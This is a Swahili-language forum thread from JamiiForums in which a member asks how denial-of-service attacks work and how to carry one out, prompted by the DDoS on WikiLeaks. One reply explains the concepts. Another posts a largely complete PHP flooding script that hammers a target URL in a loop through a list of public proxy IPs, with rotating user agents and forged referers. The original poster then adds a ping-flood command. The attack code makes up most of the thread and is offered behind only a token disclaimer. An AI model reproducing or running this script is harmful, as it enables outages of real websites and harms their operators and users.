Tuelimishane :dos attack. Whathi is it and how can it be achieved?

Mtazamaji

JF-Expert Member
Feb 29, 2008
5,940
1,427
wataalam
napenda kujua kAm kuna mwenye detailed knowlnge ya Denial of service attack.

Nimekuwwa nafutial website ya wiki leaks na naona wanalamika kuwa website yao imekuwa attacked kwa DDOS.(Ditributed Denial of Service)na hivyo kufanya watumiaji wa marekani na ulaya wasiipate .

Though nime google na naendelea kudadisi naomba tuzidi kujadiliana nipate mwanga zaidi . For the sake of knowledge.

 • Nikitaka kufanya DOS nahitaji information gani, tools gani , codes gani
 • How do u attack a website with DOS?
 • Kuna njia yeyote website inaweza kujikinda na DOS?
Nawasilisha kwa mjadala na kuelimishana
 
Kang

JF-Expert Member
Jun 24, 2008
5,287
1,833
DOS atack ni kuitumia website requests mpaka zinazidi capacity yake zukabiliana na hizo request. DDOS ni DOS ina yotoaka sehemu tofauti at once, wanachofanya ni kuinfect compyuta za watu na Bots(Program) ambazo zinashambulia website, so inakuwa ngumu zaidi kublock coz bots zinaweza zikawa kila pande ya dunia na hazitoki source moja.

Kwa mfano, nikiandaki program ambayo inafanya search kwenye Jamii forums mara elfu moja kwa sekunde, nitakuwa naperform DOS attack kwenye website hii, nikiandika Bot(Virus/program) ambayo nitaispread kisha zitashambulia Jamii forum zote kwa wakati mmoja hii ni DDOS.

Kuna njia nyingi za kufanya DOS kutegemea na services za kwenye website. Hata kuiload website mara nyingi mfululizo inaweza ikawa DOS kwa sababu eventually hosting account itazidiwa capacity. Kuna zengine ziko more complicated amabazo zinaexploit algorithm au protocol fulani kwenye net.

Kuzuia DOS ni ngumku hasa kama hauna resources za kutosha (bandwidth/processing power) basically inabidi ublock/drop requests zinazotoka kwa mshambuliaji, ila kuzidrop lazima zifike kwako kwanza na uziangalie ili ujue kuwa ni za mshambuliaji na sio za mtumiaji wa kawaida na hapo ndo resources zinapokuwa zinatumika i.e hauwezi ukablock kabla ya kuziangalia.
 
Thank you mkuu
sasa ndo nilitka kujua mfano nina website mtazamaji.com. kama junior IT exper nataka kujua how can i perform DOS attck on my own website. Can u help me with more knowledge not as an end user.

Maybe if i want to test if and how jamiiforum is vulnerable to DOS what do i need to do ?
 
Well sijawahi kutumia tools zozote za DOS. Lakini ni muhimu uje kuwa probably ni illegal kufanya hayo majaribio, hata kwenye website yako kama haufanyi hosting wewe mwenyewe, zaidi ya hapo webhost wako ataifunga website yako ikikumbwa na DOS attack kama una hosting plan za akawaida hizi "unlimited" for $5/month.
 
Chamoto

JF-Expert Member
Dec 7, 2007
7,129
13,007
This simple bot can do a trick.
ONYO Huu Ni Mfano Tuu Kwaajili Ya Kuelimishana - Sihusiki katika Matumizi Yeyote Mabaya Ha Hii Script

Attacking Script
PHP:
set_time_limit(0);
// include all functions

$mimi_tazamaji = "nataka kuipiga tovuti yangu";
 $mapigo = 0;
 while ($mimi_tazamaji == "nataka kuipiga tovuti yangu") {
   
   // Define variables
   $search_term = get_search_term();
  $cookie_file_path = "C:\".random_text().".txt";
  $target = "http://mtazamaji.com";
  $agent = get_agent();
  $proxy = get_proxy();
  $ref =  "http://www.google.com/#hl=en&q=".urlencode(trim($search_term))."&start=".rand(1,9)."0"."&sa=N&fp=".random_text().rand(100,30009);

   if (strpos ($target, "jamiiforums.com") !==false ) { exit;}
     $mapigo ++;
     get_page($target, $ref, $agent, "",$cookie_file_path, $proxy);
   if ($mapigo == 10000000000000000) {exit;}
 
 }
Function Get Search Term
PHP:
function get_search_term(){
   $my_array = array(
        
      'acha tabia mbaya wewe',
      'sasa mambo gani haya mtazamaji',
      'siku nyingine nitakuchapa',
      'usirudie tena'

  $random = array_rand($my_array);
  $search_term = $my_array[$random];
 return $search_term;
Function Get Proxy
Add more proxies (1mil) ideally unatakiwa uziweke kwenye database halafu una zicheki kabla ya kuzitumia kama ni mbovu unaziondoa kwenye database, lakini huu ni mfano tuu
PHP:
function get_proxy(){
   $my_array = array(
        
      '109.239.191.157:8080',
      '110.136.178.214:3128',
      '112.223.156.219:3128',
      '113.254.178.220:8080',
      '119.191.59.71:8080',
      '119.4.77.122:9415',
      '119.80.97.149:9415',
      '12.198.207.32:8080',
      '120.88.10.172:808',
      '121.15.212.113:3128',
      '121.241.77.201:80',
      '123.135.192.26:80',
      '124.115.21.250:808',
      '124.124.105.138:80',
      '125.37.115.212:9415',
      '125.40.85.96:3128',
      '129.105.15.38:3128',
      '129.177.16.92:80',
      '130.192.157.132:3128',
      '131.247.2.247:3124',
      '143.215.131.206:3124',
      '163.43.161.134:80',
      '168.216.26.125:8888',
      '173.13.138.43:3128',
      '173.13.150.136:80',
      '173.14.5.140:80',
      '173.201.242.9:80',
      '173.203.109.119:80',
      '173.203.215.116:80',
      '217.29.30.20:8080',
      '217.77.209.30:3128',
      '218.204.29.110:808'

  $random = array_rand($my_array);
  $proxy = $my_array[$random];
 return $proxy;
}Function Random Text

PHP:
function random_text(){

  $text ="";
  for ($digit = 0; $digit < 12; $digit++){

    $r = rand(0,1);
    $c = ($r==0)? rand(65,90) : rand(97,122);
    $text .= chr($c);

   }

  return strtolower($text);
 }

Function Get Page
( For requesting a page)
PHP:
function get_page($target, $ref, $agent,$post_data,$cookie_file_path, $proxy){

   $ch = curl_init();

   curl_setopt($ch, CURLOPT_URL, $target);
   curl_setopt($ch, CURLOPT_HEADER,0); // No http header
   curl_setopt($ch, CURLOPT_REFERER, $ref);
   curl_setopt($ch, CURLOPT_NOBODY, FALSE);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
   curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
   curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
   curl_setopt($ch, CURLOPT_USERAGENT, $agent);
     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
     curl_setopt($ch, CURLOPT_TIMEOUT, 50);

   if($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
   }
   if($post_data){
    curl_setopt($ch, CURLOPT_POST, TRUE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
     }
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
   curl_setopt($ch, CURLOPT_MAXREDIRS, 4);

   if(preg_match("/\bhttps:/", $target)){
     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
   }

    $page = curl_exec($ch);
        curl_close($ch);

    return $page;

}
Function Get Agent (add more user agents)
PHP:
function get_agent(){
   $my_array = array(
     "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
     "Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC) ",
     "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; AtHome0107)",
     "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)",
     "Mozilla/4.0 (compatible; MSIE 5.5; MSN 2.5; Windows 98; HomePage)",
     "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
     "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461; .NET CLR 1.0.3705)",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; M-Web Indonesia)",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705) ",
         );

  $random = array_rand($my_array);
  $agent = $my_array[$random];
 return $agent;
}
 
Mtazamaji

JF-Expert Member
Feb 29, 2008
5,940
1,427
Pia ping commmand inaweza kutumika kama Dos attack kwenye some simple/small website

Mfano kwenye command prompt ukitype
ping 192.168.1.1 - t - l 65500

wataalam wanasema watu wawili au wattu wakirun hiyo command kwa pamoja kwa one hour then ile ip adress ( website) itakuwa down.

NB:
kama website haina mechanism ya kublock ping flood packets. inaweza kuwa attacked na very simple technique
 
Last edited by a moderator:

Toa taarifa ya maudhui yasiyofaa!

Kuna taarifa umeiona humu JamiiForums na haifai kubaki mtandaoni?
Fanya hivi...

Umesahau Password au akaunti yako?

Unapata ugumu kuikumbuka akaunti yako? Unakwama kuanzisha akaunti?
Contact us

0 Reactions
Reply
Top Bottom